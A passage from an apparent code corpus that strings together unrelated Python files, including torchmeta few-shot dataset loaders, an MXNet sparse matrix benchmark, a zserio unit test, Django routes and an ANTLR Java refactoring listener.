response.raise_for_status()
return response
def get_http_engine_class(
headers: Mapping[str, Callable[..., Any]],
data_processor: Optional[Callable[[Mapping[str, Any]], Mapping[str, Any]]] = None
) -> Callable[..., Type[HttpEngine]]:
def _func(*args, **kwargs) -> Type[HttpEngine]:
class _HttpEngine(HttpEngine):
def _data_process(self, data: Optional[Mapping[str, Any]] = None) -> Mapping[str, Any]:
return (data_processor or (lambda d: d or {}))(data or {})
def _base_headers(self) -> Mapping[str, None]:
return translate_dict_func(headers)(*args, **kwargs)
return _HttpEngine
return _func
|
1709885
|
class Solution:
"""
@param nums:
@param sub:
@return: return a Integer array
"""
def SimpleQueries(self, nums, sub):
# write your code here
if len(sub) == 0:
return []
if len(nums) == 0:
return [0 for _ in range(len(sub))]
# O(n logn)
self.nums = nums
self.nums.sort()
results = []
for target in sub:
res = self._binarySearch(target)
results.append(res)
return results
def _binarySearch(self, target):
start, end = 0, len(self.nums) - 1
while start + 1 < end:
mid = start + (end - start) // 2
if self.nums[mid] <= target:
start = mid
else:
end = mid
if self.nums[end] <= target:
return end + 1
if self.nums[start] <= target:
return start + 1
return 0
|
1709906
|
import random
class Fish():
def __init__(self, name, color, gender, species, weight):
self.name = name
self.color = color
self.gender = gender
self.species = species
self.weight = weight
self.age = 0
self.stamina = "low" if random.randint(0,1) == 0 else "high"
self.speed = "slow" if random.randint(0,1) == 0 else "fast"
print("A fish is born")
print("This fish's name is", name + ".", name, "is a", weight, ",", color, ",",
gender, species)
def swim(self, distance):
#slow fish travel at 1 meter per second
#fast fish travel at 2 meters per second
if self.speed == "slow":
rate_of_movement = 1
else:
rate_of_movement = 2
if self.stamina == "low":
rate_of_movement_after_fifty_meters = rate_of_movement / 2
else:
rate_of_movement_after_fifty_meters = rate_of_movement
seconds_travelled = distance / rate_of_movement
print("The fish travelled", distance, "meters in", seconds_travelled,
"seconds")
return seconds_travelled
# if a fish with low stamina travels over 50 meters, it's speed is
# halved
# high stamina fish never get tired...
#identify the average speed of the fish over some distance and the time
# taken to complete the swim
fish = Fish(name = "Harold", color = "blue and gold", gender = "male",
species = "shubunkin", weight = "4 ounces")
distance_dict = {}
for i in range(101):
distance_dict[i] = fish.swim(i)
print(distance_dict)
#print(fish)
#
#x = " D F"
#y = 1
#
#print("x is a:", type(x))
#print("y is a:", type(y))
#
#lst = [i for i in range(20)]
#type_lst = [type(val) for val in lst]
#print(type_lst)
#print(type([[],[],[]]))
#
#
#
##
##for val in lst:
## val_type = type(val)
## print(val_type)
##
|
1709926
|
from django.urls import path
from system.views import login_view, UserPasswordUpdateView, logout_view, UserInfo, UserLogout,Menu
app_name = "system"
urlpatterns = [
path('login', login_view, name="login"),
path('password_update', UserPasswordUpdateView.as_view(), name="password_update"),
path('logout', logout_view, name="logout"),
path('api/user_info', UserInfo.as_view()),
path('api/logout', UserLogout.as_view()),
path('menu',Menu.as_view())
]
|
1709992
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import os
import json
import glob
import h5py
import numpy as np
import pickle
from PIL import Image, ImageOps
import torch
from torchmeta.utils.data.task import Task, ConcatTask, SubsetTask
from collections import OrderedDict
from torchmeta.utils.data import Dataset, ClassDataset, CombinationMetaDataset, MetaDataLoader
from torchmeta.utils.data.dataloader import batch_meta_collate
from torchvision.datasets.utils import list_dir, download_url, download_file_from_google_drive
from torchmeta.datasets.utils import get_asset
import warnings
from torchmeta.datasets.omniglot import OmniglotDataset
from torchmeta.datasets.miniimagenet import MiniImagenetDataset
from torchmeta.transforms import Categorical, ClassSplitter, Rotation, Splitter
from torchvision.transforms import Compose, Resize, CenterCrop, ToTensor
class OmniglotClassDataset(ClassDataset):
folder = 'omniglot'
download_url_prefix = 'https://github.com/brendenlake/omniglot/raw/master/python'
zips_md5 = {
'images_background': '68d2efa1b9178cc56df9314c21c6e718',
'images_evaluation': '6b91aef0f799c5bb55b94e3f2daec811'
}
filename = 'data.hdf5'
filename_labels = '{0}_labels.json'
def __init__(self, root, meta_train=False, meta_val=False, meta_test=False,
meta_split=None, transform=None,
class_augmentations=None, download=False):
super(OmniglotClassDataset, self).__init__(meta_train=meta_train,
meta_val=meta_val, meta_test=meta_test, meta_split=meta_split,
class_augmentations=class_augmentations)
self.root = os.path.join(os.path.expanduser(root), self.folder)
self.transform = transform
self.split_filename = os.path.join(self.root, self.filename)
self.split_filename_labels = os.path.join(self.root,
self.filename_labels.format(self.meta_split))
self._data = None
self._labels = None
if download:
self.download()
if not self._check_integrity():
raise RuntimeError('Omniglot integrity check failed')
self._num_classes = len(self.labels)
print('# classes loaded for %s:' % self.meta_split, self._num_classes)
def __getitem__(self, index):
character_name = '/'.join(self.labels[index % self.num_classes])
data = self.data[character_name]
transform = self.get_transform(index, self.transform)
target_transform = self.get_target_transform(index)
return OmniglotDataset(data, character_name, transform=transform,
target_transform=target_transform)
@property
def num_classes(self):
return self._num_classes
@property
def data(self):
if self._data is None:
self._data = h5py.File(self.split_filename, 'r')
return self._data
@property
def labels(self):
if self._labels is None:
with open(self.split_filename_labels, 'r') as f:
self._labels = json.load(f)
return self._labels
def _check_integrity(self):
return (os.path.isfile(self.split_filename)
and os.path.isfile(self.split_filename_labels))
def close(self):
if self._data is not None:
self._data.close()
self._data = None
def download(self):
import zipfile
import shutil
if self._check_integrity():
return
for name in self.zips_md5:
zip_filename = '{0}.zip'.format(name)
filename = os.path.join(self.root, zip_filename)
if os.path.isfile(filename):
continue
url = '{0}/{1}'.format(self.download_url_prefix, zip_filename)
download_url(url, self.root, zip_filename, self.zips_md5[name])
with zipfile.ZipFile(filename, 'r') as f:
f.extractall(self.root)
filename = os.path.join(self.root, self.filename)
with h5py.File(filename, 'w') as f:
group = f.create_group('omniglot')
for name in self.zips_md5:
alphabets = list_dir(os.path.join(self.root, name))
characters = [(name, alphabet, character) for alphabet in alphabets
for character in list_dir(os.path.join(self.root, name, alphabet))]
for _, alphabet, character in characters:
filenames = glob.glob(os.path.join(self.root, name,
alphabet, character, '*.png'))
dataset = group.create_dataset('{0}/{1}'.format(alphabet,
character), (len(filenames), 105, 105), dtype='uint8')
for i, char_filename in enumerate(filenames):
image = Image.open(char_filename, mode='r').convert('L')
dataset[i] = ImageOps.invert(image)
shutil.rmtree(os.path.join(self.root, name))
class MiniImagenetClassDataset(ClassDataset):
folder = 'miniimagenet'
# Google Drive ID from https://github.com/renmengye/few-shot-ssl-public
gdrive_id = '16V_ZlkW4SsnNDtnGmaBRq2OoPmUOc5mY'
gz_filename = 'mini-imagenet.tar.gz'
gz_md5 = 'b38f1eb4251fb9459ecc8e7febf9b2eb'
pkl_filename = 'mini-imagenet-cache-{0}.pkl'
filename = '{0}_data.hdf5'
filename_labels = '{0}_labels.json'
def __init__(self, root, meta_train=False, meta_val=False, meta_test=False,
meta_split=None, transform=None, class_augmentations=None,
download=False):
super(MiniImagenetClassDataset, self).__init__(meta_train=meta_train,
meta_val=meta_val, meta_test=meta_test, meta_split=meta_split,
class_augmentations=class_augmentations)
self.root = os.path.join(os.path.expanduser(root), self.folder)
self.transform = transform
self.split_filename = os.path.join(self.root,
self.filename.format(self.meta_split))
self.split_filename_labels = os.path.join(self.root,
self.filename_labels.format(self.meta_split))
self._data = None
self._labels = None
if download:
self.download()
if not self._check_integrity():
raise RuntimeError('MiniImagenet integrity check failed')
self._num_classes = len(self.labels)
print('# classes loaded for %s:' % self.meta_split, self._num_classes)
def __getitem__(self, index):
class_name = self.labels[index % self.num_classes]
data = self.data[class_name]
transform = self.get_transform(index, self.transform)
target_transform = self.get_target_transform(index)
return MiniImagenetDataset(data, class_name, transform=transform,
target_transform=target_transform)
@property
def num_classes(self):
return self._num_classes
@property
def data(self):
if self._data is None:
self._data_file = h5py.File(self.split_filename, 'r')
self._data = self._data_file['datasets']
return self._data
@property
def labels(self):
if self._labels is None:
with open(self.split_filename_labels, 'r') as f:
self._labels = json.load(f)
return self._labels
def _check_integrity(self):
return (os.path.isfile(self.split_filename)
and os.path.isfile(self.split_filename_labels))
def close(self):
if self._data_file is not None:
self._data_file.close()
self._data_file = None
self._data = None
def download(self):
import tarfile
if self._check_integrity():
return
download_file_from_google_drive(self.gdrive_id, self.root,
self.gz_filename, md5=self.gz_md5)
filename = os.path.join(self.root, self.gz_filename)
with tarfile.open(filename, 'r') as f:
f.extractall(self.root)
for split in ['train', 'val', 'test']:
filename = os.path.join(self.root, self.filename.format(split))
if os.path.isfile(filename):
continue
pkl_filename = os.path.join(self.root, self.pkl_filename.format(split))
if not os.path.isfile(pkl_filename):
raise IOError()
with open(pkl_filename, 'rb') as f:
data = pickle.load(f)
images, classes = data['image_data'], data['class_dict']
with h5py.File(filename, 'w') as f:
group = f.create_group('datasets')
for name, indices in classes.items():
group.create_dataset(name, data=images[indices])
labels_filename = os.path.join(self.root, self.filename_labels.format(split))
with open(labels_filename, 'w') as f:
labels = sorted(list(classes.keys()))
json.dump(labels, f)
if os.path.isfile(pkl_filename):
os.remove(pkl_filename)
class MiniImagenet(CombinationMetaDataset):
def __init__(self, root, num_classes_per_task=None, meta_train=False,
meta_val=False, meta_test=False, meta_split=None,
transform=None, target_transform=None, dataset_transform=None,
class_augmentations=None, download=False):
dataset = MiniImagenetClassDataset(root, meta_train=meta_train,
meta_val=meta_val, meta_test=meta_test, meta_split=meta_split,
transform=transform, class_augmentations=class_augmentations,
download=download)
super(MiniImagenet, self).__init__(dataset, num_classes_per_task,
target_transform=target_transform, dataset_transform=dataset_transform)
class Omniglot(CombinationMetaDataset):
def __init__(self, root, num_classes_per_task=None, meta_train=False,
meta_val=False, meta_test=False, meta_split=None,
transform=None, target_transform=None,
dataset_transform=None, class_augmentations=None, download=False):
dataset = OmniglotClassDataset(root, meta_train=meta_train,
meta_val=meta_val, meta_test=meta_test,
transform=transform,
meta_split=meta_split, class_augmentations=class_augmentations,
download=download)
super(Omniglot, self).__init__(dataset, num_classes_per_task,
target_transform=target_transform, dataset_transform=dataset_transform)
class RandClassSplitter(Splitter):
def __init__(self, min_train_per_class, max_train_per_class, num_test_per_class, shuffle=True):
self.shuffle = shuffle
num_samples_per_class = OrderedDict()
num_samples_per_class['train'] = (min_train_per_class, max_train_per_class)
num_samples_per_class['test'] = (num_test_per_class, num_test_per_class)
self._min_samples_per_class = min_train_per_class + num_test_per_class
super(RandClassSplitter, self).__init__(num_samples_per_class)
def _rand_split_size(self, list_n_samples):
cur_size = OrderedDict()
for split, range_split in self.splits.items():
d = range_split[1] - range_split[0] + 1
for num_samples in list_n_samples:
d = min(d, num_samples - self._min_samples_per_class + 1)
cur_size[split] = np.random.randint(d) + range_split[0]
return cur_size
def get_indices_task(self, task):
all_class_indices = self._get_class_indices(task)
indices = OrderedDict([(split, []) for split in self.splits])
cur_size = self._rand_split_size([x[1] for x in all_class_indices.items()])
for name, class_indices in all_class_indices.items():
num_samples = len(class_indices)
if num_samples < self._min_samples_per_class:
raise ValueError('The number of samples for class `{0}` ({1}) '
'is smaller than the minimum number of samples per class '
'required by `ClassSplitter` ({2}).'.format(name,
num_samples, self._min_samples_per_class))
if self.shuffle:
# TODO: Replace torch.randperm with seed-friendly counterpart
dataset_indices = torch.randperm(num_samples).tolist()
ptr = 0
for split, num_split in cur_size.items():
split_indices = (dataset_indices[ptr:ptr + num_split]
if self.shuffle else range(ptr, ptr + num_split))
indices[split].extend([class_indices[idx] for idx in split_indices])
ptr += num_split
return indices
def get_indices_concattask(self, task):
indices = OrderedDict([(split, []) for split in self.splits])
cum_size = 0
cur_size = self._rand_split_size([len(x) for x in task.datasets])
for dataset in task.datasets:
num_samples = len(dataset)
if num_samples < self._min_samples_per_class:
raise ValueError('The number of samples for one class ({0}) '
'is smaller than the minimum number of samples per class '
'required by `ClassSplitter` ({1}).'.format(num_samples,
self._min_samples_per_class))
if self.shuffle:
# TODO: Replace torch.randperm with seed-friendly counterpart
dataset_indices = torch.randperm(num_samples).tolist()
ptr = 0
for split, num_split in cur_size.items():
split_indices = (dataset_indices[ptr:ptr + num_split]
if self.shuffle else range(ptr, ptr + num_split))
indices[split].extend([idx + cum_size for idx in split_indices])
ptr += num_split
cum_size += num_samples
return indices
def _update_args(shots, ways, kwargs, shuffle=True, test_shots=None):
if 'num_classes_per_task' in kwargs:
assert ways == kwargs['num_classes_per_task']
del kwargs['num_classes_per_task']
if 'target_transform' not in kwargs:
kwargs['target_transform'] = Categorical(ways)
if 'class_augmentations' not in kwargs:
kwargs['class_augmentations'] = [Rotation([90, 180, 270])]
if isinstance(shots, int):
min_shot = max_shot = shots
else:
min_shot, max_shot = shots
if test_shots is None:
test_shots = min_shot
if 'dataset_transform' not in kwargs:
if min_shot == max_shot:
dataset_transform = ClassSplitter(shuffle=shuffle,
num_train_per_class=min_shot,
num_test_per_class=test_shots)
else:
dataset_transform = RandClassSplitter(shuffle=shuffle,
min_train_per_class=min_shot,
max_train_per_class=max_shot,
num_test_per_class=test_shots)
kwargs['dataset_transform'] = dataset_transform
return kwargs
def omniglot(folder, shots, ways, shuffle=True, test_shots=None,
seed=None, **kwargs):
if 'transform' not in kwargs:
kwargs['transform'] = Compose([Resize(28), ToTensor()])
kwargs = _update_args(shots, ways, kwargs, shuffle, test_shots)
dataset = Omniglot(folder, num_classes_per_task=ways, **kwargs)
dataset.seed(seed)
return dataset
def miniimagenet(folder, shots, ways, shuffle=True, test_shots=None,
seed=None, **kwargs):
if 'transform' not in kwargs:
kwargs['transform'] = Compose([Resize(84), ToTensor()])
kwargs = _update_args(shots, ways, kwargs, shuffle, test_shots)
dataset = MiniImagenet(folder, num_classes_per_task=ways, **kwargs)
dataset.seed(seed)
return dataset
from torch.utils.data.dataloader import default_collate
from torch.utils.data.dataset import Dataset as TorchDataset
def batch_list_collate(collate_fn):
def collate_task(task):
if isinstance(task, TorchDataset):
return collate_fn([task[idx] for idx in range(len(task))])
elif isinstance(task, OrderedDict):
return OrderedDict([(key, collate_task(subtask))
for (key, subtask) in task.items()])
else:
raise NotImplementedError()
def _collate_fn(batch):
batch = [collate_task(task) for task in batch]
assert isinstance(batch[0], OrderedDict)
keys = list(batch[0].keys())
out_dict = OrderedDict()
for key in keys:
out_dict[key] = [x[key] for x in batch]
return out_dict
return _collate_fn
def no_collate(batch):
return batch
class ListMetaDataLoader(MetaDataLoader):
def __init__(self, dataset, batch_size=1, shuffle=True, num_workers=0,
pin_memory=False, drop_last=False, timeout=0, worker_init_fn=None):
collate_fn = batch_list_collate(default_collate)
super(ListMetaDataLoader, self).__init__(dataset,
batch_size=batch_size, shuffle=shuffle, sampler=None,
batch_sampler=None, num_workers=num_workers,
collate_fn=collate_fn, pin_memory=pin_memory, drop_last=drop_last,
timeout=timeout, worker_init_fn=worker_init_fn)
|
1710028
|
from __future__ import print_function
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import ctypes
from mxnet.test_utils import *
import scipy.sparse as sp
import os
import time
import argparse
from mxnet.base import check_call, _LIB
from mxnet.test_utils import get_bz2_data
from util import estimate_density
parser = argparse.ArgumentParser(description="Benchmark sparse operators",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--num-omp-threads', type=int, default=1, help='number of omp threads to set in MXNet')
args = parser.parse_args()
# some data information
kdda = {
'data_mini': 'kdda.t.mini',
'data_name': 'kdda.t',
'data_origin_name': 'kdda.t.bz2',
'url': "https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/binary/kdda.t.bz2",
'feature_dim': 20216830,
'm': 200,
'batch_size': [64]
}
avazu = {
'data_mini': 'avazu-app.t.mini',
'data_name': 'avazu-app.t',
'data_origin_name': 'avazu-app.t.bz2',
'url': "https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/binary/avazu-app.t.bz2",
'feature_dim': 1000000,
'm': 500,
'batch_size': [64, 128]
}
def measure_cost(repeat, f, *args, **kwargs):
# start bench
start = time.time()
results = []
for i in range(repeat):
results.append(f(*args, **kwargs))
for result in results:
result.wait_to_read()
end = time.time()
diff = end - start
return diff / repeat
def test_dot_real(data_dict):
def get_iter(path, data_shape, batch_size):
data_train = mx.io.LibSVMIter(data_libsvm=path,
data_shape=data_shape,
batch_size=batch_size)
data_iter = iter(data_train)
return data_iter
data_dir = os.path.join(os.getcwd(), 'data')
path = os.path.join(data_dir, data_dict['data_name'])
if not os.path.exists(path):
get_bz2_data(
data_dir,
data_dict['data_name'],
data_dict['url'],
data_dict['data_origin_name']
)
assert os.path.exists(path)
k = data_dict['feature_dim']
m = data_dict['m']
density = estimate_density(path, data_dict['feature_dim'])
mini_path = os.path.join(data_dir, data_dict['data_mini'])
if not os.path.exists(mini_path):
os.system("head -n 2000 %r > %r" % (path, mini_path))
assert os.path.exists(mini_path)
print("Running Benchmarking on %r data" % data_dict['data_mini'])
for batch_size in data_dict['batch_size']: # iterator through different batch size of choice
print("batch_size is %d" % batch_size)
# model
data_shape = (k, )
train_iter = get_iter(mini_path, data_shape, batch_size)
weight = mx.nd.random.uniform(low=0, high=1, shape=(k, m))
csr_data = []
dns_data = []
num_batch = 0
for batch in train_iter:
data = train_iter.getdata()
csr_data.append(data)
dns_data.append(data.tostype('default'))
num_batch += 1
bag_of_data = [csr_data, dns_data]
num_repeat = 5
costs = []
for d in bag_of_data:
weight.wait_to_read()
cost = 0.
count = 0
for d_batch in d:
d_batch.wait_to_read()
cost += measure_cost(num_repeat, mx.nd.dot, d_batch, weight)
count += 1
costs.append(cost/count)
t_sparse = costs[0]
t_dense = costs[1]
ratio = t_dense / t_sparse
print('density(%)\tn\tm\tk\tt_dense/t_sparse\tt_dense\tt_sparse')
fmt = "%0.4f\t\t%d\t%d\t%d\t%0.2f\t\t\t%0.4f\t%0.6f"
print(fmt % (density * 100, batch_size, m, k, ratio, t_dense, t_sparse))
def test_dot_synthetic():
"""benchmark mx.nd.dot(sparse_ndarray, dense_ndarray) with given density.
`t_sparse` is the time cost of dot(csr, dns), while `t_dense` is the time cost
of dot(dns, dns), with the same matrix except that it is in default storage type.
"""
def measure_cost_forward_baseline(repeat, dot, lhs, rhs):
start = time.time()
for i in range(repeat):
dot(lhs, rhs)
end = time.time()
diff = end - start
return diff / repeat
def measure_cost_backward_baseline(repeat, dot, transpose, lhs, rhs):
start = time.time()
for i in range(repeat):
dot(transpose(lhs), rhs)
end = time.time()
diff = end - start
return diff / repeat
def bench_dot_forward(m, k, n, density, ctx, repeat):
set_default_context(ctx)
dns = mx.nd.random.uniform(shape=(k, n)).copyto(ctx)
data_shape = (m, k)
csr_data = rand_ndarray(data_shape, 'csr', density)
dns_data = csr_data.tostype('default')
rhs_dns_np = dns.asnumpy()
lhs_csr_sp = sp.csr_matrix(dns_data.asnumpy()) # csr in scipy
lhs_dns_np = lhs_csr_sp.tostype('default')
data = [dns_data, csr_data]
costs = []
for d in data:
dns.wait_to_read()
d.wait_to_read()
cost = measure_cost(repeat, mx.nd.dot, d, dns)
costs.append(cost)
ratio = costs[0] / costs[1]
costs_baseline = []
cost = measure_cost_forward_baseline(repeat, np.dot, lhs_dns_np, rhs_dns_np)
costs_baseline.append(cost)
cost = measure_cost_forward_baseline(repeat, sp.spmatrix.dot, lhs_csr_sp, rhs_dns_np)
costs_baseline.append(cost)
ratio_baseline = costs_baseline[0] / costs_baseline[1]
fmt = "%0.1f\t\t%s\t%d\t%d\t%d\t%0.2f\t\t\t%0.2f\t%0.5f\t\t%0.2f\t\t\t\t%0.6f\t%0.5f"
print(fmt % (density * 100, str(ctx), n, m, k, ratio, costs[0], costs[1],
ratio_baseline, costs_baseline[0], costs_baseline[1]))
def bench_dot_backward(m, k, n, density, ctx, repeat):
set_default_context(ctx)
dns = mx.nd.random.uniform(shape=(m, n)).copyto(ctx)
data_shape = (m, k)
csr_data = rand_ndarray(data_shape, 'csr', density)
dns_data = csr_data.tostype('default')
rhs_dns_np = dns.asnumpy()
lhs_csr_sp = sp.csr_matrix(dns_data.asnumpy())
lhs_dns_np = lhs_csr_sp.tostype('default')
data = [dns_data, csr_data]
costs = []
for d in data:
dns.wait_to_read()
d.wait_to_read()
cost = measure_cost(repeat, mx.nd.dot, d, dns, transpose_a=True)
costs.append(cost)
ratio = costs[0] / costs[1]
costs_baseline = []
cost = measure_cost_backward_baseline(repeat, np.dot, np.transpose, lhs_dns_np, rhs_dns_np)
costs_baseline.append(cost)
cost = measure_cost_backward_baseline(repeat, sp.spmatrix.dot, sp.spmatrix.transpose, lhs_csr_sp, rhs_dns_np)
costs_baseline.append(cost)
ratio_baseline = costs_baseline[0] / costs_baseline[1]
fmt = "%0.1f\t\t%s\t%d\t%d\t%d\t%0.2f\t\t\t%0.2f\t%0.5f\t\t%0.2f\t\t\t\t%0.6f\t%0.5f"
print(fmt % (density * 100, str(ctx), n, m, k, ratio, costs[0], costs[1],
ratio_baseline, costs_baseline[0], costs_baseline[1]))
print("A = sparse NDArray of shape(m, k)")
print("B = dense NDArray of shape(k, n)")
print("dot_forward\tdot(csr, dns)")
print('density(%)\tcontext\tn\tm\tk\tt_dense/t_sparse\tt_dense\tt_sparse'
'\tt_scipy_dense/t_scipy_sparse\tt_scipy_dense\tt_scipy_sparse')
check_call(_LIB.MXSetNumOMPThreads(ctypes.c_int(args.num_omp_threads)))
# TODO(haibin) make these runtime options
m = 512
k = [50000, 100000]
n = [64, 128]
density = [1.00, 0.90, 0.70, 0.50, 0.30, 0.20, 0.10, 0.07, 0.05, 0.02, 0.01, 0.005, 0.001]
num_repeat = 10
# contexts = [mx.cpu(), mx.gpu(0)]
contexts = [mx.cpu()]
for i in range(2):
for ctx in contexts:
for den in density:
bench_dot_forward(m, k[i], n[i], den, ctx, num_repeat)
print("dot_backward\tdot(csr.T, dns)")
print('density(%)\tcontext\tn\tm\tk\tt_dense/t_sparse\tt_dense\tt_sparse'
'\tt_scipy_dense/t_scipy_sparse\tt_scipy_dense\tt_scipy_sparse')
for i in range(2):
for ctx in contexts:
for den in density:
bench_dot_backward(m, k[i], n[i], den, ctx, num_repeat)
if __name__ == "__main__":
test_dot_real(avazu)
test_dot_real(kdda)
test_dot_synthetic()
|
1710080
|
import datetime
from my_app import db
class Product(db.Document):
created_at = db.DateTimeField(
default=datetime.datetime.now, required=True
)
key = db.StringField(max_length=255, required=True)
name = db.StringField(max_length=255, required=True)
price = db.DecimalField()
def __repr__(self):
return '<Product %r>' % self.id
|
1710088
|
import unittest
import zserio
from testutils import getZserioApi
class VarSizeRangeCheckTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.api = getZserioApi(__file__, "with_range_check_code.zs",
extraArgs=["-withRangeCheckCode"]).varsize_range_check
def testVarSizeLowerBound(self):
self._checkVarSizeValue(VARSIZE_LOWER_BOUND)
def testVarSizeUpperBound(self):
self._checkVarSizeValue(VARSIZE_UPPER_BOUND)
def testVarSizeBelowLowerBound(self):
with self.assertRaises(zserio.PythonRuntimeException):
self._checkVarSizeValue(VARSIZE_LOWER_BOUND - 1)
def testVarSizeAboveUpperBound(self):
with self.assertRaises(zserio.PythonRuntimeException):
self._checkVarSizeValue(VARSIZE_UPPER_BOUND + 1)
def _checkVarSizeValue(self, value):
varSizeRangeCheckCompound = self.api.VarSizeRangeCheckCompound(value)
bitBuffer = zserio.serialize(varSizeRangeCheckCompound)
readVarSizeRangeCheckCompound = zserio.deserialize(self.api.VarSizeRangeCheckCompound, bitBuffer)
self.assertEqual(varSizeRangeCheckCompound, readVarSizeRangeCheckCompound)
VARSIZE_LOWER_BOUND = zserio.limits.VARSIZE_MIN
VARSIZE_UPPER_BOUND = zserio.limits.VARSIZE_MAX
|
1710101
|
from gen.javaLabeled.JavaLexer import JavaLexer
try:
import understand as und
except ImportError as e:
print(e)
from antlr4 import *
from antlr4.TokenStreamRewriter import TokenStreamRewriter
from gen.javaLabeled.JavaParserLabeled import JavaParserLabeled
from gen.javaLabeled.JavaParserLabeledListener import JavaParserLabeledListener
class IncreaseFieldVisibilityRefactoringListener(JavaParserLabeledListener):
"""
## Introduction
# TODO: Change name to decrease
1. Private
2. Protected
3. Package (no modifier)
4. Public
Increase the visibility of a field from private to package, package to protected or protected to public.
## Pre and Post Conditions
### Pre Conditions:
1. User must enter the field's name, and the source class's name for the refactoring
in order to increase the target field's visibility.
### Post Conditions:
No specific Post Condition
"""
def __init__(self, common_token_stream: CommonTokenStream = None, source_class=None, field_name: str = None):
"""To implement Increase Field Visibility refactoring based on its actors.
Detects the required field and increases/changes its visibility status.
Args:
common_token_stream (CommonTokenStream): A stream of tokens generated by parsing the main file using the ANTLR parser generator
source_class (str): Name of the class in which the refactoring has to be done
field_name (str): Name of the field whose visibility status has to be changed
Returns:
No returns
"""
if field_name is None:
self.field_name = ""
else:
self.field_name = field_name
if source_class is None:
self.source_class = ""
else:
self.source_class = source_class
if common_token_stream is None:
raise ValueError('common_token_stream is None')
else:
self.token_stream_rewriter = TokenStreamRewriter(common_token_stream)
self.is_source_class = False
self.detected_field = None
self.detected_method = None
self.TAB = "\t"
self.NEW_LINE = "\n"
self.code = ""
self.temp_declaration_code = ""
def enterClassDeclaration(self, ctx: JavaParserLabeled.ClassDeclarationContext):
class_identifier = ctx.IDENTIFIER().getText()
if class_identifier == self.source_class:
self.is_source_class = True
else:
self.is_source_class = False
def exitFieldDeclaration(self, ctx: JavaParserLabeled.FieldDeclarationContext):
if not self.is_source_class:
return None
grand_parent_ctx = ctx.parentCtx.parentCtx
# field_identifier = ctx.variableDeclarators().getText().split(",")
field_identifier = ctx.variableDeclarators().variableDeclarator(0).variableDeclaratorId().IDENTIFIER().getText()
if self.field_name in field_identifier:
if not grand_parent_ctx.modifier():
self.token_stream_rewriter.replaceRange(
from_idx=ctx.typeType().start.tokenIndex,
to_idx=ctx.typeType().stop.tokenIndex,
text='private ' + ctx.typeType().getText()
)
elif grand_parent_ctx.modifier(0).getText() == 'public':
self.token_stream_rewriter.replaceRange(
from_idx=grand_parent_ctx.modifier(0).start.tokenIndex,
to_idx=grand_parent_ctx.modifier(0).stop.tokenIndex,
text='private')
elif grand_parent_ctx.modifier(0).getText() != 'private':
self.token_stream_rewriter.replaceRange(
from_idx=grand_parent_ctx.modifier(0).start.tokenIndex,
to_idx=grand_parent_ctx.modifier(0).stop.tokenIndex,
text='private ' + grand_parent_ctx.modifier(0).getText())
# generate accessor and mutator methods
# Accessor body
new_code = '\n\t'
new_code += 'public ' + ctx.typeType().getText() + ' get' + str.capitalize(self.field_name)
new_code += '() { \n\t\t return this.' + self.field_name + ';' + '\n\t}'
# Mutator body
new_code += '\n\t'
new_code += 'public void set' + str.capitalize(self.field_name)
new_code += '(' + ctx.typeType().getText() + ' ' + self.field_name + ') { \n\t\t'
new_code += 'this.' + self.field_name + ' = ' + self.field_name + ';' + '\n\t}\n'
self.token_stream_rewriter.insertAfter(ctx.stop.tokenIndex, new_code)
class PropagationIncreaseFieldVisibilityRefactoringListener(JavaParserLabeledListener):
def __init__(self, common_token_stream: CommonTokenStream = None, using_field_name=None, object_name=None,
propagated_class_name=None, action_to_do=None):
"""
Used for propagation purposes in the other classes of the project: implement the propagation
Args:
common_token_stream (CommonTokenStream): A stream of tokens generated by parsing the main file using the ANTLR parser generator
using_field_name (str): Name of the field which has to be propagated
object_name (str): Name of the objects that need to be changed with the propagation operation
propagated_class_name (str): Name of the class in which the propagation operation needs to be implemented
Returns: No returns
"""
if using_field_name is None:
self.using_field_name = []
else:
self.using_field_name = using_field_name
if action_to_do is None:
self.action_to_do = []
else:
self.action_to_do = action_to_do
if object_name is None:
self.object_name = []
else:
self.object_name = object_name
if propagated_class_name is None:
self.propagated_class_name = []
else:
self.propagated_class_name = propagated_class_name
if common_token_stream is None:
raise ValueError('common_token_stream is None')
else:
self.token_stream_rewriter = TokenStreamRewriter(common_token_stream)
self.is_class = False
def enterClassDeclaration(self, ctx: JavaParserLabeled.ClassDeclarationContext):
# print("Propagation started, please wait...")
class_identifier = ctx.IDENTIFIER().getText()
if class_identifier in self.propagated_class_name:
self.is_class = True
print("Propagation started, please wait......")
else:
self.is_class = False
def is_before_equal(self, parent_ctx):
try:
if str(type(
parent_ctx)) == "<class 'gen.javaLabeled.JavaParserLabeled.JavaParserLabeled.Expression21Context'>":
if str(type(parent_ctx.children[
0])) == "<class 'gen.javaLabeled.JavaParserLabeled.JavaParserLabeled.Expression1Context'>":
return True
return False
except:
return False
def getoperator(self, str):
return (str[0:1])
def check_is_expression_obj_and_field(self, ctx):
if str(ctx.children[0].getText()) in self.object_name and str(
ctx.children[2].getText()) == self.using_field_name:
return True
else:
return False
# print(ctx.children[0].getText())
# print(ctx.children[1].getText())
# print(ctx.children[2].getText())
def enterExpression1(self, ctx: JavaParserLabeled.Expression1Context):
if not self.is_class: return
parent_ctx = ctx.parentCtx;
if self.is_before_equal(parent_ctx):
# print("going to set")
if self.action_to_do == "Get":
return None
# {{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{
if isinstance(parent_ctx, JavaParserLabeled.Expression21Context):
# print("parent_ctx.children[1]:", str(parent_ctx.children[1]))
if (str(parent_ctx.children[1]) in ["+=", "-=", "*=", "/=", "&=", "|=", "^=", ">>=", ">>>=", "<<=",
"%="]):
if self.action_to_do == "Get":
return None
if ctx.expression() is not None:
